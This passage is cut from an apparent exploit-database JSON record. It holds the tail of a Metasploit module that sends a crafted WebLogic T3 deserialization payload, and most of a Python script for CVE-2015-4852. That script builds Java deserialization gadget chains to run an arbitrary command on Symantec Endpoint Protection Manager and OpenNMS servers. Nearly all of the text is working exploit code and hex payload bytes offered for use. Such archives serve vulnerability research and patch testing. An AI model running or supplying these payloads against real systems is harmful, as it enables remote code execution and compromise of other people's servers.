payload << '00297765626c6f6769632e726d692e70726f76' # Name: weblogic.rmi.provider.BasicServiceContext\r

payload << '696465722e426173696353657276696365436f' # (cont)\r

payload << '6e74657874' # (cont)\r

payload << 'e4632236c5d4a71e' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # block footer\r

payload << '77' # block header\r

payload << '020600' # contents = 0x0600\r

payload << '7372' # class descriptor\r

payload << '00267765626c6f6769632e726d692e696e7465' # Name: weblogic.rmi.internal.MethodDescriptor\r

payload << '726e616c2e4d6574686f644465736372697074' # (cont)\r

payload << '6f72' # (cont)\r

payload << '12485a828af7f67b' # serialVersionUID\r

payload << '0c' # EXTERNALIZABLE | BLOCKDATA\r

payload << '0000' # fieldCount = 0\r

payload << '7870' # class footer\r

payload << '77' # class data\r

\r

#payload << '34002e61757468656e746963617465284c7765' # old contents = 0x002e61757468656e746963617465284c7765\r

#payload << '626c6f6769632e73656375726974792e61636c' # 626c6f6769632e73656375726974792e61636c\r

#payload << '2e55736572496e666f3b290000001b' # 2e55736572496e666f3b290000001b\r

payload << rand_text_alphanumeric(52).unpack('H*')[0] # new = randomized\r

payload << '78' # class footer\r

payload << '78' # block footer\r

# MISSING OBJECT FOOTER (0x78)\r

\r

payload << 'fe00ff' # this cruft again. some kind of footer\r

\r

# sets the length of the stream\r

data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')\r

data << payload\r

\r

sock.put([data].pack('H*'))\r

sleep(1)\r

sock.get_once\r

\r

end\r

\r

def exploit\r

connect\r

\r

print_status('Sending handshake...')\r

t3_handshake\r

\r

print_status('Sending T3 request object...')\r

build_t3_request_object\r

\r

print_status('Sending client object payload...')\r

send_payload_objdata\r

\r

handler\r

disconnect\r

end\r

end", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46628"}, {"lastseen": "2018-05-24T14:18:40", "description": "Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution. CVE-2015-4852. Remote exploit for Multiple platform", "published": "2016-07-20T00:00:00", "type": "exploitdb", "title": "Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-4852"], "modified": "2016-07-20T00:00:00", "id": "EDB-ID:44552", "href": "https://www.exploit-db.com/exploits/44552/", "sourceData": "#! /bin/bash/env python3\r

#\r

# ____ _ _ _ \r

# / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

# \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

# ___) | __/ | | | (_| | | (_| | || (_) | | \r

# |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

#\r

# By Nikhil Sreekumar (@roo7break)\r

#\r

\r

import sys\r

import base64\r

import httplib2\r

import socket\r

import argparse\r

import socket\r

import os\r

import struct\r

import ctypes\r

\r

version = \"0.1\"\r

banner = \"\"\"\r

____ _ _ _ \r

/ ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r

\\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r

___) | __/ | | | (_| | | (_| | || (_) | | \r

|____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r

by Nikhil Sreekumar (@roo7break) v %s\r

\r

\"\"\" % version\r

\r

def hex2raw3(teststr):\r

\"\"\"\r

This function takes a string (expecting hexstring) and returns byte string\r

\"\"\"\r

# From: HexToByte() at http://code.activestate.com/recipes/510399-byte-to-hex-and-hex-to-byte-string-conversion/\r

bytes = []\r

teststr = ''.join( teststr.split(\" \") )\r

for i in range(0, len(teststr), 2):\r

bytes.append( chr( int (teststr[i:i+2], 16 ) ) )\r

return \"\".join(bytes)\r

\r

def symantec_endpoint_attack(HOST, PORT, SSL_On, _cmd):\r

# The below code is based on the symantec_endpoint_prot_mgr_2015_6554.nasl script within Nessus\r

\"\"\"\r

This function sets up the attack payload for Symantec Endpoint\r

\"\"\"\r

\r

java_payload = '\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x25\\x63\\x6f\\x6d\\x2e\\x73\\x79\\x67\\x61\\x74\\x65\\x2e\\x73\\x63\\x6d\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x52\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0e\\x72\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x4c\\x69\\x6e\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x76\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x01\\x75\\x71\\x00\\x7e\\x00\\x20\\x00\\x00\\x00\\x03\\x74\\x00\\x07\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x74\\x00\\x02\\x2f\\x63\\x74\\x00'\r

\r

cleng = len(_cmd)\r

java_payload += chr(cleng) + _cmd\r

java_payload += '\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a'\r

\r

fullpayload = \"\"\"------=_Part_0_992568364.1449677528532\r

Content-Type: application/binary\r

Content-Disposition: form-data; name=\"Content\"\r

\r

%s \r

\r

------=_Part_0_992568364.1449677528532--\r

\"\"\" % java_payload\r

\r

if SSL_On:\r

webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r

URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r

else:\r

webservice = httplib2.Http()\r

URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r

\r

headers = {\"User-Agent\":\"Symantec_RCE_POC\",\r

\"Content-type\":\"multipart/form-data;\",\r

\"boundary\":\"----=_Part_0_992568364.1449677528532\",\r

\"Accept\":\"text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2\\r\

\",\r

\"Connection\":\"keep-alive\",\r

\"Content-length\":\"%d\" % len(fullpayload)\r

}\r

resp, content = webservice.request(URL_ADDR+\"/servlet/ConsoleServlet?ActionType=SendStatPing\", \"POST\", body=fullpayload, headers=headers)\r

# print provided response.\r

print(\"[i] Response received from target: %s\" % resp)\r

\r

def opennms_attack(HOST, PORT, _cmd):\r

# The below code is based on the opennms_java_serialize.nasl script within Nessus\r

\"\"\"\r

This function sets up the attack payload for OpenNMS\r

\"\"\"\r

clen = len(_cmd)\r

d1 = '\\x4a\\x52\\x4d\\x49\\x00\\x02\\x4b'\r

d2 = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x05\\x70\\x77\\x6e\\x65\\x64\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x70\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x00\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x70\\x78\\x71\\x00\\x7e\\x00\\x02\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x24\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x21\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74'\r

d2 += '\\x00' + chr(clen)\r

d2 += _cmd\r

